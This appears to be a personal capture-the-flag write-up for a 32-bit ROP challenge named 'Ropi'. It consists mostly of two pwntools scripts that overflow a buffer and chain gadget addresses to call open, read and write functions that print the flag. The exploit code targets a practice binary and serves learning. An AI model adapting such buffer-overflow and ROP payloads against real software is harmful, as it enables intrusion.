Ropi
This Problem took me few days but still i was unable to finish it .. but then my senior helped me out
This binary accepts a message which contains buffer .... yeah vulnerable to overflow !! But the thing you have to do is execute three func ret, ori , pro which open ,read, write the flag
Yeah u have to do it by ROP .
from pwn import *
context.bits=32
ret=0x8048569
ori=0x80485c4
pro=0x804862c
popret=0x8048395
pop2ret=0x80486ee
ezy=0x0804852d
rete=0x804837e
payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy)
payload2="B"*47+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(pro)
print payload
print payload2
The above one works , all credit goes to my senior but i will also post my payload which works locally not in the server don't know why but i learnt one thing
we can make everything in life much simpler than we think :)
from pwn import *
context.bits=32
ret=0x8048569
ori=0x80485c4
pro=0x804862c
popret=0x8048395
pop2ret=0x80486ee
ezy=0x0804852d
prop=0x0804863e
rete=0x804837e
payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy)
payload2="A"*44+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(prop)
#payload3="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(pro)
# binary starts
p=process('ropi')
#p=remote('ropi.vuln.icec.tf',6500)
msg=p.recvuntil('?\n')
print msg
p.sendline(payload) # for first read through main
msg=p.recvuntil('?\n')
print msg
p.sendline(payload2)
"""msg=p.recvuntil('?\n')
print msg+" read by exploit 2"
p.sendline(payload3)"""
msg=p.recvall()
print msg